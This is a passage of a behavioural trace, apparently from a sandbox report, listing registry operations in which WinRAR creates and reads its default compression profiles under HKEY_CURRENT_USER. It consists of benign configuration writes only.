Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = VersionControl, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = BLAKE2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileCopies, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = QuickOpen, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = GenerateMask, data = yyyymmddhhmmss, size = 30, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileTimeMode, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileDays, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileHours, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileMinutes, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = FileTimeLimit, data = 0, size = 8, type = REG_QWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ArcTimeOriginal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ArcTimeLatest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = mtime, data = 4, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = ctime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = atime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = PathsAbs, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = PathsNone, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = PathsAbsDrive, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SeparateArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SeparateArcDoubleExt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = SeparateArcSubfolders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = EmailArcTo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = PackDetails, size = 192, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Name, data = Create e-mail attachment, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Name, data = Backup selected files, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Name, data = Create 10 MB volumes, size = 42, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Default, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ArcName False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileNames False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ImmExec, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ExclNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = StoreNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = UseRAR, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = RAR5, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SFXModule, size = 2, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SFX False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SFXIcon, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SFXLogo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SFXElevate, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = CmtFile, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = CmtDataWide, size = 2, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = VolumeSize, data = 10485760, size = 18, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = VolSizeMod, data = 2, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = VolPause, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = OldVolNames, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = RecVolNumber, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Update, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Fresh, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SyncFiles, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Overwrite, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Move, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ArcRecBin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ArcWipe, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = WipeIfPassword, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Solid, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Test, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = RecEnabled, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = RecSize, data = 4294967293, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = EraseDest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = AddArcOnly, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ClearArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Lock, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Method, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = DictSizeLZ, data = 33554432, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = DictSize, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Background, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = WaitForOther, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Shutdown, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = PasswordData, size = 1, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = EncryptHeaders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ZipLegacyEncrypt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = OpenShared, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ProcessOwners, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SaveStreams, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SaveSymLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SaveHardLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = GenerateArcName, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = VersionControl, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = BLAKE2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileCopies, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = QuickOpen, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = GenerateMask, data = yyyymmddhhmmss, size = 30, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileTimeMode, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileDays, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileHours, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileMinutes, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileTimeLimit, data = 0, size = 8, type = REG_QWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ArcTimeOriginal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ArcTimeLatest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = mtime, data = 4, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ctime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = atime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = PathsAbs, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = PathsNone, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = PathsAbsDrive, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SeparateArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SeparateArcDoubleExt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SeparateArcSubfolders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = EmailArcTo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = PackDetails, size = 192, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Name, data = Create e-mail attachment, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
